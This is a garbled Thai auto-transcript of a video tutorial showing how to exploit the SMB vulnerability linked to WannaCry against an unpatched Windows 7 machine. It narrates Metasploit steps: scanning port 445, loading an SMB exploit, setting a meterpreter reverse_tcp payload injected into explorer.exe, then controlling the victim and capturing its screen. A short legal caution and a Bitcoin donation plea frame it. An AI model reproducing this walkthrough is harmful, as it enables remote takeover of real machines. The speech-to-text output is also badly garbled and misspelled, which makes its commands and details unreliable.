สวัสดีครับวันนี้ผมก็จะมาทำการสาธิตวิธีการโจมตีช่องโหว่ external b o o นะครับหรือเนี่ยครับที่แฮกเกอร์เขาพัฒนากันแล้วกลายเป็น r a n s o m w a r e ตัวเนี้มีชื่อว่าวันาคลายนะครับก็คือช่องโหว่เนี่ยเนี่ยจะเป็นช่องโหว่ของ SMB นะครับของ Windows ทุก Windows เลยแต่หลักๆที่ผมเห็นในการโจมตีอ่าเมื่อเดือนที่แล้วะครับมันจะโจมตีเน้น เป็น windows 7นะครับที่ยังไม่ได้อัปเดตก็คือทุก windows เลยที่ยังไม่ได้อัปเดตกันนั่แหละครับโอเคตอนนี้ผมก็จะมาสาธิตวิธีการโจมตีช่องโหว่นั้นนะครับเดี๋ยวหลักการตรงนี้ะครับแ a น s o ซัมแวร์เนี่ยครับของวานาคลายที่มีชื่อวานาคลายเนี่ยมันเป็นการเขาเรียกว่าโปรแกรมเครถ่ายอ่ายก็คือโปรแกรมเนี้ยคุณไม่ต้องไปคลิกาการที่จะติด ไอ้ตรงนี้ได้ไอ้วันนาคายเนี่ยคุณไม่จําเป็นต้องไปคลิกที่อื่นหรือเข้าลิงก์แปลกอร์มหรือโหลดโปรแกรมไวรัสอะไรมานะครับคือถ้าคุณเครื่องคุณอ่ะยังไม่ได้อัปเดตวินโดว์ไอ้โปรแกรมเนี่ยมันจะเด้งขึ้นมาตอนที่เราเปิดเครื่องเลยครับและมันก็จะมีรายละเอียดบอกว่าคุณต้องจ่ายตังเป็นบิตคอยให้พวกแฮกเกอร์ครับพวกแฮกเกอร์ก็ค่อยจะปลดล็อกคอมของคุณเพื่อที่จะเข้าถึงข้อมูลคุณได้อะไรลักษณะเนี่ยครับ โอเคตอนนี้ผมจะไม่พูดมากนะผมจะมาสาธิตวิธีการโจมตีช่องโหว่เลยนะครับโอเคครับอย่างแรกผมก็จะมาเปิดไอ้โปรแกรมนี้ขึ้นมาแคริลินโน้ของผมแล้วก็ตรงนี้ครับเป็นเหยื่อเครื่องเหยื่อของเราก็คือเป็น Windows 7นะครับตรงนี้อยู่ในเครือข่ายแลนนะครับผมยังไม่สอนเครือข่ายแวนนะครับก็คือ ตอนนี้ก็มีพรบอรคอมออกมาเพื่อนๆก็ต้องศึกษาไปด้วยนะครับตรงนี้หลักการนี้ก็อย่าไปใช้แบบมัวซัวนะครับก็อาจจะโดนติดคุกได้นะครับโอเคตอนนี้ผมจะมาตรวจสอบว่า ip ในวงแลนเนี่ยเป็น ip อะไรของเครื่องเหยื่อเป็น ip อะไรเครื่องของเราเป็น ip อะไรผมจะตรวจสอบไปดูนะครับอย่างแรกเลยตรงเครื่องนี้นะครับตรงเครื่องแฮกเกอร์เนี่ยเป็น IP นี้จุด 1, ด1ส่วนเครื่องเยอือกเป็นอย่างนี้นะครับจุด1ดโอเคอย่างแรกเลยผมจะเปิดไอเมตาสปอยขึ้นมานะครับตรงนีเ้เดี๋ยวรอสักครู่นะครับโอเคครับเมื่อเปิดไอเม s าสปอยตรงนี้ขึ้นมาแล้วจะเป็นหน้าต่างอย่างนี้นะครับ หน้าตายอย่า,ง,าองนี้เลยนรับสปอยตัวนี้ออย่างแรกผมจะพิมพ์คาว่า use นี่ครับ s c a n n e r smb คือผมจะทดสอบว่า,าเครื่องที่ผมต้องการที่จะเข้าไปโจมตีเนี่ยมีช่องโหว่ตรงนี้หรือเปล่าโอเคแล้วผมก็ม,มาเซต rhost 192.168.1.4คือเครื่องเหยื่อตรงนี้นครับ r h o s t ก็คือไปเครื่องเหยื่อก็คือตรงนี้นะครับ enter ทีนี้ผมจะลอง r ันดูว่าเป็นยังไงเนี่ยครับก็จะขึ้นมาอย่างเงี้ยตรงนี้จะบอกว่าเนี่ยคอมพิวเตอร์ของ windows 7ตรงนี้ยมีช่องโว่ก็คือช่องโว่ที่ port ต445ช่องโว่ SMP นะคระับะขออภัยนะครับ SMB นะครับโอเคก็เราสามารถทำการที่จะแฮกเครื่องเหยื่อตรงนี้ได้นะครับเพราะว่าเครื่องเหยื่อเนี้ยยังไม่ได้อัปเดตวินโด่ะทีนี้ต่อไปผมจะแบ็กก่อนนะตรงนี้แบ็กก่อนเพื่อที่จะไป use ใช้ e x p l o i t Windows so แล้วก็ SMB x. number. number. p o s i t e โอเคผมเขียนถูกไหมโอเคเขียนถูกอยู่อันที้ต่อมาผมก็จะมาเซตเซต payload window เซต payload window x หกสิ meter p i c t u r reverse TCP ตรงนี้ครับเดี๋ยวผมจะขยายให้ดูก่อนตรงส่วนนี้ครับ reverse TCP เพื่อให้มันตอบกลับมาครับเพื่อจะให้ช่องโบที่เราเจาะเข้าไปตอบกลับมาโอเคทีนี้ผมก็จะมา set, เซต r o c e s s ให้มัน Set process inject Explorer exe เอเคครับแล้วก็เซ t ชาร์จเกถ้าเพื่อนๆไม่ทันก็กดสต o อปไว้ก่อนนะครับสองหนึ่ check x 6 4โอเคทีนี้ผมก็ลองมาเซต L h o s t ของผม อันนี้ผมจะทำ,ทำแบบเต็มรูปแบบเลยนะครับอาร์โก็คือเครื่องเราส่วนเพื่อนๆที่จำไม่ได้ก็กดตรงนี้นะครับ Open Terminal แล้วก็ ifconfig เนี่ยครับก๊อปมาเลยก็ได้นะครับแล้วก็มาเซต R host R o s t ก็คือเครื่องเหยือ่อ 0.8.1.4ทีเนี้ยก็ลองลันดูนะครับตรงเนี้ยเพื่อนๆอาจจะช็อกเลยก็ได้นะครับก็คือสังเกตตรงเครื่องเหยือนนะครับเครื่องเยืตรงนี้เราก็เป็นเครื่องที่เราเปิดโปรแกรมอะไรเล็กตามปกตินะครับไม่ได้เป็นลงโปรแกรมอะไรไปเลยทีเนี้ยผมจะลองลันให้ดูว่าเกิดอะไรขึ้นตรงเนี้ยครับ สังเกตตรงนี้นครับยังไม่มีอะไรเกิดขึ้นนะครับเป็นเครื่องเหยื่อเปิดเครื่องมาปกติอันนี้คือเครื่องแฮกเกอร์นะครับอยู่ในวง LAN ดูนะครับเครื่องเหยื่อจะมีปฏิกิริยาอะไรอาจจะรอนานสักครู่นะครับเดี๋ยวผมจะโพสไว้ก่อนแล้วกันเผื่อมันนานเกินไปสวัสดีครับหลังจากผ่านไปสักประมาณ30วิได้นะครับก็เนี่ยครับเป็นอย่างนี้เลย ได้มีการช่องโหวจมตีผ่าน External Boot สำเร็จแล้วตอนนี้ถึงตรงนี้ผมก็สามารถที่จะคุมเครื่องนี้ได้แล้วนะครับก็คือเราสามารถควบคุมไอ้เครื่องนี้ได้เลยทันทีเดี๋ยวผมจะลอง System Info ดูเนี่ยครับเขียนนี้เลยว่าเครื่องเหยื่อเนี่ยเป็นเครื่องอะไรที่เราโจมตีได้แฮกเกอร์จะรู้อ่าเนี่ยครับแฮกเกอร์ก็จะรู้ว่า ใช้คอมพิวเตอร์ OS Windows 7นะครับในการใช้งานทีนีนะ้ผมลองเฮลดดูเราสามารถทำอะไรกับเครื่องเหยือได้ตามคลิปที่แล้วนะครับผมก็มีสอนไว้อยู่นะครับเราผมลองเฮลดดูเนี่ยครับก็สามารถทำได้หลายแบบมากเลยครับตรงนี้ครับคุณจะทำอะไรก็ได้หมดนะครับก็คือโดนแฮกแล้วอะ่ะ ทีนี้ผมจะลองมาทำอะไรนะอยากทำอะไ apwd อยากรู้ว่าตอนนี้อยู่ตรงไหนก็ทำได้เยอะ,ะครับ screen shot เป็นยังไงนะเดี๋ยวผมจะลอง copy ดูนะแล้วก็ใช้ดู screen shot เออนะอันนี้เป็นเครื่องแฮกเกอร์นะครับตรงนี้มันบอกว่ารูปภาพของคุณได้เซฟไปที่ตรง root ตรงนี้ละเดี๋ยวผมจะลองมาเปิดดู ไฟแล้วก็ u i k เนี่ยใช่ป่ะครับเนี่ยตรงเนี้ย u i k เนี่ยครับตรงเนี้ยเมื่อกี้สกรีนช็อตตรงเนี้ยครับก็เป็นการบันทึกหน้าจอของเครื่องเหยื่อนะครับก็จะได้แล้วว่าเครื่องเหยื่อทําอะไรบ้างเนี่ยก็เป็นหน้านี้นะครับโอเคตรงนี้ก็เป็นวิธีการสาธิตง่ายๆนะครับที่ผม ทำการสาธิตให้ดูผมเ็ยอยากเตือนให้เพื่อนๆได้ทำการอัปเดต Windows ไว้ด้วยนะครับก็ช่องโหว่นี้อันตรายมากเลยนะครับแล้วเพื่อนๆคนไหนที่นำไปใช้ก็นำไปใช้นชในทางที่ถูกต้องด้วยนะครับส่วนเรื่องที่ยากที่สุดในการาทำพวกนี้ไม่ใช่ว่าเพิ่มตามผมนะครับเป็นการเซตติ้งนะครับคือการตั้งค่าของพวกไอ้โปรแกรมพวกนี้ ก่อนที่จะตั้งมาได้ต้องตั้งค่าอะไรบ้างอะไรพวกนี้คือเป็นสิ่งที่ยากมากนะครับอ่ะทีนี้ตอนคลิปนี้ผมยังไม่สอนการตั้งค่านะครับเดี๋ยวให้เพื่อนๆลองตั้งค่าเองดูก่อนถ้ามีปัญหาอะไรก็สามารถทักมาถามผมได้นะครับส่วนที่ผมถ้าผมยังไม่ตอบหรือผมติดธุระอะไรก็ไม่ว่ากันนะครับโอเคเดี๋ยวจะมีคลิปต่อไปต่อไปมาเรื่อยๆเลยนะครับส่วนคลิปต่อไป ก็จะเป็นเรื่องบิตคอยนะครับเพราะว่าอะไรที่จะมาพูดถึงบิตคอยบิตคอยมาแรงมากเลยนะครับในขณะนี้เพื่อนๆควรศึกษาไปด้วยนะครับเดี๋ยวผมจะทําคลิปออกมาให้เพื่อนๆได้รับชมดูนะครับว่ามันคืออะไรบิตคอยคืออะไรแล้วใครคนไหนที่อยากจะด o n a t i หรืออยากจะเขาเรียกว่าอะไรล่ะอยากจะช่วยให้ผมได้พัฒนาคลิปต่อไปหรือด o n a t i o นั่นแหละ ก็สามารถโดเน a ได้ที่ช่องทางใต้คลิปเลยนะครับเป็นบิตคอยท่านั้นนะครับโอเคครับขอบคุณครับสวัสดีครับขอบคุณที่ติดตามนะครับอย่าลืมกด subscribe ด้วยนะครับขอบคุณครับ